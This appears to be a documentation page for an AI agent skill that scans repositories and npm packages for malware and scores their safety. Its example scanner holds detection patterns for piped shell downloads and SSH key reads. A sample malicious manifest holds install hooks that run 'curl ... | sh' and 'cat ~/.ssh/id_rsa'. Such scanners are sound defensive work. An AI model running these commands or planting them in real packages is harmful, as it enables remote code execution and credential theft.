Check for security risks in Skills and code repositories. Use it when the user wants to check whether a skill, GitHub repository, npm package, or local code is safe to download or use. This includes detecting malicious code, malware, key stealing, environment variable modification, and suspicious network behavior, and evaluating repository reputation (stars, forks, contributors, age). Use this skill whenever the user mentions checking skills for security risks, scanning repositories for malware, verifying code safety, checking npm packages for threats, or asking if a download is safe.
```bash
npx skill4agent add wcly/skills skill-security-checker
```

```
Check this repository's security: https://github.com/user/repo
Check skill: github.com/user/repo
```
3. **npm Packages**:
### Output Format
Users can choose the output format:
- `json` - Structured JSON report
- `friendly` - Friendly interface with emojis
- `concise` - Concise summary (default)
### Optional Parameters
- `--runtime` - Enable runtime behavior monitoring (detect dangerous scripts in package.json)
## How It Works
### Phase 1: Pre-Download Check (Mandatory)
1. **Static Code Analysis** - Detect the following patterns:
   - Malicious code: base64 encoded payloads, eval/exec calls, encrypted strings, anti-debugging techniques
   - Sensitive information theft: reading SSH keys, API tokens, environment variables
   - Environment damage: modifying system configurations, deleting files
   - Suspicious network behavior: sending data to unknown domains, reverse shells
2. **Repository Reputation Evaluation**:
   - GitHub stars count
   - Fork count
   - Creation time
   - Last update time
   - Contributor count
### Phase 2: Runtime Monitoring (Optional)
When the user adds the `--runtime` parameter:
- Detect dangerous scripts in package.json (preinstall, postinstall, etc.)
- Detect suspicious dependency packages
- Briefly execute in a sandbox environment to observe behavior
### Comprehensive Assessment
- Calculate security score (0-100)
- Risk level: High/Medium/Low
- Recommendation: Downloadable/Not recommended for download
- Detailed explanation of reasons
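
The lifecycle-script check from Phase 2 feeding the 0-100 score, as an added example that is not the skill's own code. The rule ids, weights and the LOW/MEDIUM/HIGH thresholds are assumptions chosen for illustration, and the two manifests are constructed samples.

```typescript
// Added example, not the skill's code: rule ids, weights and thresholds are assumptions.
interface ScanRule { id: string; pattern: RegExp; weight: number; }
interface ScanFinding { script: string; rule: string; }
interface ScanReport { score: number; level: "LOW" | "MEDIUM" | "HIGH"; findings: ScanFinding[]; }

// Hooks that npm can run automatically during `npm install`.
const LIFECYCLE_HOOKS: string[] = ["preinstall", "install", "postinstall", "prepare"];

const RULES: ScanRule[] = [
  { id: "download-piped-to-shell", pattern: /\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z)?sh\b/i, weight: 50 },
  { id: "base64-decode", pattern: /base64\s+(-d|--decode)\b|Buffer\.from\([^)]*base64|\batob\(/i, weight: 30 },
  { id: "inline-eval", pattern: /\bnode\s+(-e|--eval)\b|\beval\s*\(/i, weight: 25 },
  { id: "ssh-key-access", pattern: /\.ssh\/|id_(rsa|ed25519)\b/i, weight: 40 },
  { id: "env-dump", pattern: /\bprintenv\b|process\.env\b|\.npmrc\b/i, weight: 20 },
];

function scanPackageJson(text: string): ScanReport {
  let manifest: any;
  try {
    manifest = JSON.parse(text);
  } catch (e) {
    // A manifest that cannot be parsed cannot be cleared, so report it as high risk.
    return { score: 0, level: "HIGH", findings: [{ script: "(manifest)", rule: "invalid-json" }] };
  }
  const scripts = manifest && typeof manifest.scripts === "object" && manifest.scripts ? manifest.scripts : {};
  const findings: ScanFinding[] = [];
  let penalty = 0;
  LIFECYCLE_HOOKS.forEach(function (hook) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") return; // hook absent or not a command string
    RULES.forEach(function (rule) {
      if (rule.pattern.test(cmd)) {
        findings.push({ script: hook, rule: rule.id });
        penalty += rule.weight;
      }
    });
  });
  const score = Math.max(0, 100 - penalty); // clamp to the 0-100 range
  const level: ScanReport["level"] = score >= 70 ? "LOW" : score >= 40 ? "MEDIUM" : "HIGH";
  return { score: score, level: level, findings: findings };
}

// Constructed sample manifests (not taken from any real package).
const BENIGN = JSON.stringify({ name: "demo-ok", scripts: { test: "jest", prepare: "tsc -p ." } });
const SUSPICIOUS = JSON.stringify({
  name: "demo-bad",
  scripts: { postinstall: "curl -s https://example.invalid/i.sh | sh", preinstall: "cat ~/.ssh/id_rsa" },
});
```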
## Example Commands
```bash
# Check a GitHub repository (friendly output)
skill-security-checker github octocat/Hello-World friendly
# Check a GitHub repository (JSON format)
skill-security-checker github https://github.com/lodash/lodash json
# Check a local folder
skill-security-checker local /path/to/my-skill
# Check an npm package
skill-security-checker npm express
# Enable runtime checks
skill-security-checker github user/repo friendly --runtime
```

```
╔══════════════════════════════════════════════════════╗
║ Skill Security Check Report ║
╠══════════════════════════════════════════════════════╣
✅ Risk Level: LOW
📊 Security Score: 85/100
✅ Recommendation: Downloadable
╠══════════════════════════════════════════════════════╣
📈 Repository Information:
⭐ Stars: 50000+
🍴 Forks: 5000+
👥 Contributors: 200+
📅 Creation Date: 2012-01-01
╚══════════════════════════════════════════════════════╝
```

```
╔══════════════════════════════════════════════════════╗
║ Skill Security Check Report ║
╠══════════════════════════════════════════════════════╣
🔴 Risk Level: HIGH
📊 Security Score: 15/100
❌ Recommendation: Not recommended for download
╠══════════════════════════════════════════════════════╣
⚠️ Risk Reasons:
- Detected malicious code patterns (base64 encoded payload)
- Detected access to SSH keys
- Repository lacks social oversight (stars < 10)
📈 Repository Information:
⭐ Stars: 5
🍴 Forks: 0
👥 Contributors: 1
╚══════════════════════════════════════════════════════╝
```

detectionPatterns.ts